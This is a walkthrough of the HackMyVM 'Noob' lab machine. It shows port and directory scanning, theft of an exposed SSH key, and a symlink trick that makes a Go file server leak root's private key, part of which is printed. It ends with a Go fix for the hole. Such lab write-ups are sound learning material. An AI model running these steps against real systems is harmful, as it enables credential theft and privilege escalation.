Daily archive: August 7, 2021

HackMyVm Noob Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

```bash
~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for secret.vinci.hmv (192.168.56.100)
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
|   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
|_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Check the HTTP service on port 65530.

```bash
~ curl http://192.168.56.100:65530
404 page not found
```

Try /index.

```bash
~ curl http://192.168.56.100:65530/index
Hi, You are close!
```

Scan directories. Because the server returns too many fake responses, we omit file extensions.

```bash
~ gobuster dir -u http://192.168.56.100:65530 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard -o 65530.log
...

/index (Status: 200) [Size: 19]
/http%3A%2F%2Fwww (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 47] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 46] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
/http%3A%2F%2Fradar (Status: 301) [Size: 47] [--> /http:/radar]
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fweblog (Status: 301) [Size: 48] [--> /http:/weblog]
/http%3A%2F%2Fswik (Status: 301) [Size: 46] [--> /http:/swik]
/nt4share (Status: 301) [Size: 45] [--> /nt4share/]
```

Notice the last entry, /nt4share. Check it.

```bash
~ curl http://192.168.56.100:65530/nt4share/
<pre>
<a href=".Xauthority">.Xauthority</a>
<a href=".bash_history">.bash_history</a>
<a href=".bash_logout">.bash_logout</a>
<a href=".bashrc">.bashrc</a>
<a href=".profile">.profile</a>
<a href=".ssh/">.ssh/</a>
<a href="linpeas.sh">linpeas.sh</a>
<a href="pspy64">pspy64</a>
</pre>
```

It's a user's home folder exposed by the file server. From .bash_history, we get a user name, "adela".

```bash
~ curl http://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null
...
```

From .ssh/, we download id_rsa and log in over SSH as user adela.

```bash
~ chmod 600 id_rsa
~ ssh adela@192.168.56.100 -i id_rsa
...
adela@noob:~$ id
uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

The last step is tricky. We enumerated a lot but still could not find a way to root.

Create a symbolic link to /root/.ssh/id_rsa inside adela's home directory (the directory the file server exposes as /nt4share/), then read it through HTTP: the server follows the symlink and can read a file that adela herself cannot.

```bash
adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
...
~ curl http://192.168.56.100:65530/nt4share/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
...
ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
-----END OPENSSH PRIVATE KEY-----
```
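The root step works because the Go file server exposes a writable home directory, serves dotfiles such as .ssh/ and .bash_history, and follows symlinks with its own privileges. The following is an added example (not code from the machine or the original post) of how a Go net/http file handler can close both holes; the function names SafeResolve and Handler are assumed.

```go
package main
import (
	"errors"
	"net/http"
	"path"
	"path/filepath"
	"strings"
)
var (
	ErrOutsideRoot = errors.New("path resolves outside the served root") // symlink escape
	ErrHidden      = errors.New("hidden file or directory is not served") // .ssh, .bash_history
)
// SafeResolve (hypothetical name) maps a URL path onto the filesystem under root,
// rejecting dotfile components and any symlink whose real target leaves root.
func SafeResolve(root, urlPath string) (string, error) {
	clean := path.Clean("/" + urlPath) // collapses "..", always starts with "/"
	for _, part := range strings.Split(clean, "/") {
		if strings.HasPrefix(part, ".") {
			return "", ErrHidden
		}
	}
	absRoot, err := filepath.Abs(root)
	if err == nil {
		absRoot, err = filepath.EvalSymlinks(absRoot) // canonical root for the prefix check
	}
	if err != nil {
		return "", err
	}
	// A link like ~/id_rsa -> /root/.ssh/id_rsa resolves to its real target here and fails the prefix check.
	resolved, err := filepath.EvalSymlinks(filepath.Join(absRoot, filepath.FromSlash(clean)))
	if err != nil {
		return "", err
	}
	if resolved != absRoot && !strings.HasPrefix(resolved, absRoot+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return resolved, nil
}

// Handler serves a file only after SafeResolve has accepted the request.
func Handler(root string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		p, err := SafeResolve(root, r.URL.Path)
		if err != nil {
			http.NotFound(w, r) // one answer for hidden, escaping and missing files
			return
		}
		http.ServeFile(w, r, p)
	})
}
```

Running the server as an unprivileged account is still required: the check only stops the symlink trick, it does not change what the process itself is allowed to read.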